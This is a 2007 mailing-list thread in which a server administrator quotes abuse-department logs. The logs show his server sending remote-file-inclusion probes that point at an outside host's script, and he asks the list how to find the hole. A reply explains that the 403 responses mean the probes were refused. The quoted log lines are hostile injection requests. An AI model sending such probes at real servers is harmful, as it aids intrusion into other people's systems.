[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Server injection attack

On Jul 10, 10:50 am, Roberto C. Sánchez <robe...@connexer.com> wrote:
> On Tue, Jul 10, 2007 at 01:55:54AM -0000, rocky wrote:
> > Hey list,
>
> > Currently, we get some notice about some one is using our server doing
> > injection attacks against other servers.
>
> > Below are some log files they sent to us
> > $------------------Snap begin---------------------------$
> >  our.server.ip.address - - [09/Jul/2007:00:31:43 +0200] "GET
> > >  //.comhttp://http://chapolin.110mb.com/check.jpg?HTTP/1.0"; 403 7414 "-"
> > >  "Mozilla/5.0"
> > >  our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET
> > >  //.infohttp://http://chapolin.110mb.com/check.jpg?HTTP/1.0"; 403 7415
> > >  "-" "Mozilla/5.0"
> > >  our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET
> > >  //.brhttp://http://chapolin.110mb.com/check.jpg?HTTP/1.0"; 403 7413 "-"
> > >  "Mozilla/5.0"
> > $----------------snap end---------------------------------$
>
> > Unfortunately, the person who is in charge of server maintaining is
> > away now and we can not get hold of him. Can any of you give me some
> > direction on how to track down the security hole and eliminate it
> > please?
>
> > Thanks a lot in advance!
>
> Well, if all the requests are getting a 403 response like the ones you
> have snipped, then I wouldn't worry.  The 403 code means "forbidden", so
> your server is not allowing the access anyways and only logging it.
>
> Regards,
>
> -Roberto
> --
> Roberto C. Sánchezhttp://people.connexer.com/~robertohttp://www.connexer.com
>
>  signature.asc
> 1KDownload

Hey Roberto,

Thank you very much for your reply! Yes all of the rest are getting a
403 response. The problem is that the log files are sending over by
FortressITX Abuse Dept. They are complaining our server is used to do
injection attack against other servers.

Can any of you help me please?

Thanks a lot!

Blesings,
Rocky
Reply to: